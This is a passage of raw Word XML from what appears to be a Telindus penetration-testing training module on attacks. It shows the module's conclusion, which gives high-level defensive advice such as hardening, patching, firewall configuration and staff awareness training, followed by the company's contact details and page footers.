      <w:r w:rsidR="00D0549A">
        <w:t>thing</w:t>
      </w:r>
      <w:r w:rsidR="004E1BA5">
        <w:t xml:space="preserve"> more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C602B" w14:textId="598C8229" w:rsidR="00957D88" w:rsidRDefault="00957D88" w:rsidP="00D532B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc26269453"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="28B00DEF" w14:textId="16F5588E" w:rsidR="004D0E54" w:rsidRDefault="00F01A98" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Many topics and new notions have been covered in this module, from how to get a shell on a machine to post-exploitation and lateral movements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52FC34" w14:textId="2BAC50C5" w:rsidR="009636DE" w:rsidRDefault="009636DE" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If the recon phase has been done </w:t>
      </w:r>
      <w:r w:rsidR="00BA19C2">
        <w:t>efficiently</w:t>
      </w:r>
      <w:r>
        <w:t>, an attacker might have several paths to compromise a target: web application, non-patch</w:t>
      </w:r>
      <w:r w:rsidR="00E542D2">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine in DMZ, misconfigured network control, phishing…</w:t>
      </w:r>
      <w:r w:rsidR="00E542D2">
        <w:t xml:space="preserve"> Once he has an access on a machine, the hacker can target new machine and/or escalate its privileges to gather even more information (like admin password). The more access an attacker have, the more information he will </w:t>
      </w:r>
      <w:r w:rsidR="002A4CBB">
        <w:t>be able to gather</w:t>
      </w:r>
      <w:r w:rsidR="00E542D2">
        <w:t xml:space="preserve"> and the more harmful the attack will be.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEDED5" w14:textId="18C31E4C" w:rsidR="00E02BC0" w:rsidRDefault="00E02BC0" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Some countermeasures exist to prevent such an attacker from compromising a network: hardening machines by disabling unused and/or dangerous features (such as LLMNR/ NBT-NS) or simply by adding some boundaries between networks. Firewalls are useful if and only if they are</w:t>
      </w:r>
      <w:r w:rsidR="008C6BE7">
        <w:t xml:space="preserve"> correctly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB1892D" w14:textId="4BA70BD5" w:rsidR="005C1EB7" w:rsidRDefault="00230D0E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Patching systems and using security best practices to configure Active Directory is also a good way to prevent an attacker from becoming domain admin easily if he managed to get an access to a domain user.</w:t>
      </w:r>
      <w:r w:rsidR="005C1EB7">
        <w:t xml:space="preserve"> Indeed, employees might the weakest link in a company security chain and that is why they should be trained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627DC8C9" w14:textId="466B905F" w:rsidR="005C1EB7" w:rsidRPr="00083EEF" w:rsidRDefault="005C1EB7" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security awareness campaign and </w:t>
      </w:r>
      <w:r w:rsidR="005D5EE7">
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> campaign might increase the awareness level of the employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C81A3A3" w14:textId="50E62897" w:rsidR="000D6E50" w:rsidRDefault="000D6E50" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D2944E" w14:textId="77777777" w:rsidR="00293958" w:rsidRPr="000D6E50" w:rsidRDefault="00293958" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:sectPr w:rsidR="00293958" w:rsidRPr="000D6E50" w:rsidSect="00B8382D">
          <w:headerReference w:type="even" r:id="rId40"/>
          <w:headerReference w:type="default" r:id="rId41"/>
          <w:footerReference w:type="default" r:id="rId42"/>
          <w:headerReference w:type="first" r:id="rId43"/>
          <w:footerReference w:type="first" r:id="rId44"/>
          <w:pgSz w:w="8419" w:h="11906" w:orient="landscape" w:code="9"/>
          <w:pgMar w:top="851" w:right="249" w:bottom="851" w:left="851" w:header="283" w:footer="340" w:gutter="567"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA8957F" w14:textId="77777777" w:rsidR="00792BE6" w:rsidRDefault="00792BE6" w:rsidP="00792BE6">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="480" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
          <w:color w:val="CC0000"/>
          <w:kern w:val="32"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00792BE6">
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:eastAsia="Times" w:hAnsi="Utopia Std"/>
          <w:color w:val="CC0000"/>
          <w:kern w:val="32"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contact information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4539E567" w14:textId="77777777" w:rsidR="00920FC6" w:rsidRDefault="00920FC6" w:rsidP="00920FC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="142"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top w:w="142" w:type="dxa"/>
          <w:left w:w="142" w:type="dxa"/>
          <w:bottom w:w="142" w:type="dxa"/>
          <w:right w:w="142" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6580"/>
      </w:tblGrid>
      <w:tr w:rsidR="0008357F" w:rsidRPr="00096743" w14:paraId="768782BB" w14:textId="77777777" w:rsidTr="00B623F3">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6580" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcMar>
              <w:top w:w="142" w:type="dxa"/>
              <w:bottom w:w="142" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08576578" w14:textId="77777777" w:rsidR="0008357F" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>...............................................</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId45" w:history="1">
              <w:r w:rsidRPr="00792BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>cybersecurity@telindus.lu</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="1BDC4FD0" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00792BE6" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD7D06">
              <w:t>Cybersecurity Department</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>Telindus Luxembourg</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId46" w:history="1">
              <w:r w:rsidRPr="00792BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>sags@telindus.lu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId47" w:history="1">
              <w:r w:rsidRPr="00792BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>pentest@telindus.lu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId48" w:history="1">
              <w:r w:rsidRPr="00792BE6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>grc@telindus.lu</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6DEEA046" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00792BE6" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">Twitter: </w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>@S_Team_Approved</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>...............................................</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>2, rue des Mines</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>L-4244 Esch-sur-Alzette</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>T +352 45 09 15 1</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>F +352 45 09 11</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:br/>
              <w:t>...............................................</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008357F" w:rsidRPr="00792BE6" w14:paraId="2366471A" w14:textId="77777777" w:rsidTr="00B623F3">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6580" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="12" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
            <w:tcMar>
              <w:top w:w="142" w:type="dxa"/>
              <w:bottom w:w="142" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47AF2FF4" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00792BE6" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD7D06">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Damien GITTER</w:t>
            </w:r>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B91D98">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Senior Ethical Hacker, Security Consultant</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26CF6C66" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00792BE6" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00792BE6">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cybersecurity Department</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7E46D7" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00B91D98" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91D98">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GIAC Certified (GSEC, GCIA, GCIH, GPEN, GWAPT, GMOB, GXPN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>,GMON</w:t>
            </w:r>
            <w:r w:rsidRPr="00B91D98">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D709260" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00792BE6" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B91D98">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Certified OSSTMM (OPST &amp; OPSA)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72AC58D8" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00AD7D06" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD7D06">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T +352 23 28 20 7784</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD7D06">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
              <w:t>M +352 691 777 784</w:t>
            </w:r>
            <w:r w:rsidRPr="00AD7D06">
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId49" w:history="1">
              <w:r w:rsidRPr="00AD7D06">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                  <w:sz w:val="18"/>
                </w:rPr>
                <w:t>damien.gitter@telindus.lu</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="58D94CDB" w14:textId="77777777" w:rsidR="0008357F" w:rsidRPr="00AD7D06" w:rsidRDefault="0008357F" w:rsidP="00B623F3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CB5AB13" w14:textId="77777777" w:rsidR="00293958" w:rsidRPr="00096743" w:rsidRDefault="00293958" w:rsidP="00410A3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00293958" w:rsidRPr="00096743" w:rsidSect="00B8382D">
      <w:headerReference w:type="even" r:id="rId50"/>
      <w:headerReference w:type="default" r:id="rId51"/>
      <w:headerReference w:type="first" r:id="rId52"/>
      <w:pgSz w:w="8419" w:h="11906" w:orient="landscape" w:code="9"/>
      <w:pgMar w:top="851" w:right="249" w:bottom="851" w:left="851" w:header="283" w:footer="340" w:gutter="567"/>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3EBC12" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C1DC80" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
    <w:p w14:paraId="2234EBCD" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E5A78A6" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD3422F" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
    <w:p w14:paraId="469EE2A9" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="002711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opia Std">
    <w:altName w:val="Cambria Math"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000001" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name=".AppleSystemUIFont">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Parchment">
    <w:panose1 w:val="0304060204070804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Leelawadee UI">
    <w:panose1 w:val="020B0502040204020203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A3000003" w:usb1="00000000" w:usb2="00010000" w:usb3="00000000" w:csb0="000101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4D"/>
    <w:family w:val="auto"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="000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Pristina">
    <w:panose1 w:val="03060402040406080204"/>
    <w:charset w:val="00"/>
    <w:family w:val="script"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Utopia Std Semibold">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000001" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001"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4DB32" w14:textId="2401901C" w:rsidR="00B70BCA" w:rsidRPr="00921D73" w:rsidRDefault="00B70BCA" w:rsidP="00760F4D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:t>OSSTMM - MODULE 3 – Attack</w:t>
    </w:r>
    <w:r w:rsidRPr="00921D73">
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
      <w:t xml:space="preserve">, Sensitivity: </w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00921D73">
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> DOCPROPERTY  Sensitivity  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-GB"/>
      </w:rPr>
      <w:t>Confidential</w:t>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="7169D086" w14:textId="5FAB5089" w:rsidR="00B70BCA" w:rsidRPr="00AE6D27" w:rsidRDefault="00B70BCA" w:rsidP="00760F4D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9700"/>
        <w:tab w:val="right" w:pos="9771"/>
      </w:tabs>
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:t>Telindus SA, Route d’Arlon, 81-83 L-8009 Strassen | Luxembourg | T +352 45 09 15-1 | F +352 45 09 11</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:br/>
      <w:t xml:space="preserve">TVA 1993 2204 072  | LU 15605033 | certifié ISO 9001:2008 par Bureau Veritas Certification - </w:t>
    </w:r>
    <w:hyperlink r:id="rId1" w:history="1">
      <w:r w:rsidRPr="00A0747B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="fr-LU"/>
        </w:rPr>
        <w:t>www.telindus.lu</w:t>
      </w:r>
    </w:hyperlink>
    <w:r>
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:t xml:space="preserve"> - </w:t>
    </w:r>
    <w:r w:rsidRPr="0046741E">
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:t xml:space="preserve">Page </w:t>
    </w:r>
    <w:r w:rsidRPr="00E66C2D">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="0046741E">
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r w:rsidRPr="00E66C2D">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00C61995">
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:t>58</w:t>
    </w:r>
    <w:r w:rsidRPr="00E66C2D">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="0046741E">
      <w:rPr>
        <w:lang w:val="fr-LU"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES  \* Arabic </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00C61995">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>83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06F80" w14:textId="00BA6D28" w:rsidR="00B70BCA" w:rsidRDefault="00B70BCA" w:rsidP="006B0D7D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4153"/>
        <w:tab w:val="clear" w:pos="9700"/>
        <w:tab w:val="left" w:pos="1823"/>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16352F" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="65033B0B" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
    <w:p w14:paraId="47FCEF49" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0D108C3F" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE0F6FF" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="00271136"/>
    <w:p w14:paraId="277071A0" w14:textId="77777777" w:rsidR="00271136" w:rsidRDefault="0027113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C0F3A" w14:textId="190A3D2E" w:rsidR="00C61995" w:rsidRDefault="00C61995">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
